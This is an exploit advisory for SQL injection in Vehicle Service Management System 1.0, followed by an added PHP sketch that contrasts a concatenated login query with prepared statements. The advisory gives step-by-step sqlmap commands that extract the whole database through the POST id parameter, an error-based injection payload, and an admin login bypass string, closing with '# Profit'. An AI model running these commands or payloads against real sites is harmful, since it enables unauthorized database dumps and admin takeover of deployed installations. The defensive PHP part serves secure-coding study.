Vehicle Service Management System 1.0 SQL Injection

Vehicle Service Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities, one of which allows for authentication bypass.


MD5 | d3cafda8b344117eabc44ad3416220ca

# Exploit Title: Vehicle Service Management 1.0 - SQL Injection Error Based
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 - Open sqlmap
Step 2 - Enter the payload string for sqlmap (replace localhost with the site address)
Step 3 - Dump database info.


SQLMAP Command:


sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[email protected]&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E

Results:

Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&[email protected]&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa


Step 3:

Dump the entire database.

sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&[email protected]&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump



# Exploit Title: Vehicle Service Management 1.0 - SQL Authentication Bypass
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:
Step 1 - Go to http://site/admin/login.php (to login)
Step 2 - Enter the payload below for username and password
Step 3 - Login as admin!

Payload:

' or 1=1-- -

# Profit
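
Added example (not part of the original advisory and not the application's source code): a self-contained PHP sketch of why the login payload above is accepted by a query built with string concatenation, next to a prepared-statement version and an integer check for a numeric parameter such as id. The table, function names, sample password and in-memory SQLite database are assumptions made for illustration; the real application's schema and code are not shown on this page.

```php
<?php
// Added illustration. Table, functions and sample data are hypothetical,
// not taken from Vehicle Service Management System's source.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)')
   ->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Vulnerable pattern: input is concatenated into the SQL text, so a quote in
// $username closes the string literal and the remainder is parsed as SQL.
function login_concat(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT id FROM users WHERE username = '$username' "
         . "AND password_hash = '$password'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened pattern: the statement text is fixed, input is bound as data, and
// the password is checked with password_verify() outside the WHERE clause.
function login_prepared(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// Numeric parameters (such as a POSTed id): accept only a positive integer,
// and still bind the resulting value rather than concatenating it.
function parse_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

$payload = "' or 1=1-- -"; // the login payload quoted in the advisory above
$checks = [
    'concatenated query, advisory payload'  => login_concat($db, $payload, $payload),
    'prepared statement, advisory payload'  => login_prepared($db, $payload, $payload),
    'prepared statement, valid credentials' => login_prepared($db, 'admin', 'constructed-sample-password'),
    'parse_id on a constructed quoted id'   => parse_id("1' AND 1=1-- x") !== null,
    'parse_id on "1"'                       => parse_id('1') !== null,
];
foreach ($checks as $label => $accepted) {
    printf("%-40s %s\n", $label, $accepted ? 'accepted' : 'rejected');
}
```

Running it from the command line requires the pdo_sqlite extension; each line of output shows whether the given input was accepted or rejected by the corresponding function.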
